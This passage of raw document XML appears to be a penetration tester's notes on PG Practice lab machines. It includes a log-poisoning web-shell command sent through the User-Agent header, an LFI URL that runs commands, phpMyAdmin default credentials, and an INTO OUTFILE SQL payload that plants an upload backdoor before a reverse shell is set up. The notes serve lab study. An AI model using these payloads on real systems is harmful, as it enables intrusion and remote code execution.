    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000045F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1034"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl http://target/ -A "&lt;?php system($_GET['cmd']); ?&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000460">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1034"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-A stands for Agent and it replaces the original agent </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1034"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://target/vuln.php?page=</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/path/to/logfile</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;cmd=whoami</w:t>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pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000464">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_djllwyc71zuj" w:id="30"/>
      <w:bookmarkEnd w:id="30"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reading PHP source code to understand how file upload works</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000465">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000466">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId73">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Mzeeav</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice, we got a zip file with the PHP source, code, and we had to read and understand upload.php which the upload page. We had to understand in order to find out how to upload a web/reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000467">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="889"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId74">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 much longer writeup but it explains it better</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hyperlink r:id="rId75">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Zipper</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice also reads PHP course code for an upload.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000046B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ombpedlpt1b0" w:id="31"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">phpMyAdmin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000046E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000046F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Default creds:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000470">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="358"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root:[no password]</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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8r920uvug7tr" w:id="32"/>
      <w:bookmarkEnd w:id="32"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to get reverse shell from phpMyAdmin:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000473">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From the </w:t>
      </w:r>
      <w:hyperlink r:id="rId76">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Squid</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice, after logging into phpMyAdmin as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root:[no password]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we found an exploit to get a reverse shell by using the SQL feature in the phpMyAdmin GUI</w:t>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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We will create a new file called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uploader.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the root web directory that allows us to upload a shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000476">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to the SQL Tab and insert this code (from </w:t>
      </w:r>
      <w:hyperlink r:id="rId77">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">this</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> github page). We found this github page by searching "get shell from phpMyAdmin" on google:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000477">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000478">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"&lt;?php echo \'&lt;form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\"&gt;\';echo \'&lt;input type=\"file\" name=\"file\" size=\"50\"&gt;&lt;input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"&gt;&lt;/form&gt;\'; if( $_POST[\'_upl\'] == \"Upload\" ) { if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) { echo \'&lt;b&gt;Upload Done.&lt;b&gt;&lt;br&gt;&lt;br&gt;\'; }else { echo \'&lt;b&gt;Upload Failed.&lt;/b&gt;&lt;br&gt;&lt;br&gt;\'; }}?&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000479">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">INTO OUTFILE 'C:/wamp/www/uploader.php';</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4357688" cy="2060125"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="225" name="image221.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image221.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId78"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4357688" cy="2060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C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000047D">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Click the 'Go' button and we are set.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000047E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3643313" cy="519639"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="63" name="image61.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image61.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId79"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3643313" cy="51963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7F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then browse to the newly created php file (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/uploader.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000480">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3765916" cy="1110462"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="2" name="image12.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image12.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId80"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3765916" cy="11104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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we can upload the shell of our choice.</w:t>
      </w:r>
      <w:hyperlink r:id="rId81">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId82">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Mine is the Ivan Sincek</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="1155cc"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">version.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000483">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="857"/>
        </w:numPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The PHP Ivan Sincek shell works well for Windows!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000484">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3245518" cy="1976438"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="562" name="image553.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image553.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId83"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3245518" cy="1976438"/>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after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy it to a file and upload it too </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/uploader.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000486">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then we need to set up a listener. Be sure to use rlwrap to preserve arrow functionality upon connection. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I like to use port 135 on Windows because I know it allows egress traffic</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000487">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="84"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Egress </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">traffic refers to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">outbound network traffic</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> — meaning traffic that leaves a system or network and goes </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">out to another network</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, such as the internet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000488">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dv1z0dhcqsts" w:id="33"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">General:</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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Default credentials:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> root : [no password]</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The</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> default path</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for phpmyadmin is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/phpmyadmin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, so check that if you already got a foothold into web server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000048D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000048E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then check </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">config-db.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> if it exists, or any other</w:t>
      </w:r>
